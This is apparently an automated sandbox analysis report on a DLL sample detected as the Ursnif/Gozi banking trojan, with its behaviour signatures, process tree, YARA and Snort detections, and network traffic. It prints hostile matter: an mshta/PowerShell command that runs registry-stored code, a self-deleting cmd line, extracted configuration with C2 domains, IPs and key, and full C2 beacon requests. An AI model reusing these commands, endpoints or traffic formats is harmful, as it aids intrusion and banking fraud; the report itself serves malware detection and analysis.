Windows Analysis Report
xaj0e933Uv.dll

Overview

General Information

Sample Name: xaj0e933Uv.dll
Analysis ID: 620332
MD5: 69e570a35f63ea12cbad7a10b25a6ea4
SHA1: f0ca60563eeb9098ad6133daa1fc48c3987437e2
SHA256: 3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
Tags: dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 1900 cmdline: loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5132 cmdline: rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4084 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3504 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 6592 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • mshta.exe (PID: 6548 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings
00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(21 further entries not shown)

Source | Rule | Description | Author | Strings
2.3.rundll32.exe.50494a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.5596b40.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.5596b40.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.3.rundll32.exe.55694a0.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
2.2.rundll32.exe.3430000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(4 further entries not shown)

No Sigma rule has matched
Snort IDS alerts:
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
05/04/22-16:27:54.122082 | 2033203 | 49769 | 80 | TCP | A Network Trojan was detected
05/04/22-16:27:53.231327 | 2033203 | 49769 | 80 | TCP | A Network Trojan was detected
05/04/22-16:27:53.642851 | 2033203 | 49769 | 80 | TCP | A Network Trojan was detected
05/04/22-16:27:33.120656 | 2033203 | 49760 | 80 | TCP | A Network Trojan was detected
AV Detection

Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source: xaj0e933Uv.dll | Virustotal: Detection: 40%
Source: xaj0e933Uv.dll | ReversingLabs: Detection: 47%
Source: xaj0e933Uv.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_03435FBB
Source: xaj0e933Uv.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0348BAD1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_034799BC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_034765C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0347FD47

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.189.151.28 80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49769 -> 185.189.151.28:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49769 -> 185.189.151.28:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
Source: global traffic | HTTP traffic detected:
GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 (50 identical entries)
Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/
Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2
Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2
Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS
Source: rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/CXrN03_2FVmE00A0jBbCC/p4SMYAv6bGfrxOGb/gRNWHNhEtgY8LT7/5NqawS2a2mm
Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000012.00000003.416459549.000001E6362BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.osofts/Microt0
Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03431CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_03431CA5
Source: global traffic | HTTP traffic detected:
GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: 185.189.151.28
Connection: Keep-Alive
Cache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.254755088.000000000095B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

                      System Summary

                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: xaj0e933Uv.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03434BF1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03431645
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0343829C
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347B238
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034767CA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348154D
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03493DB0
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347F2A9 CreateProcessAsUserA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03436D0A NtMapViewOfSection
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0343190C GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03434321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034384C1 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03485312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03482331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_03487950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0347710A GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0348A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_034800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
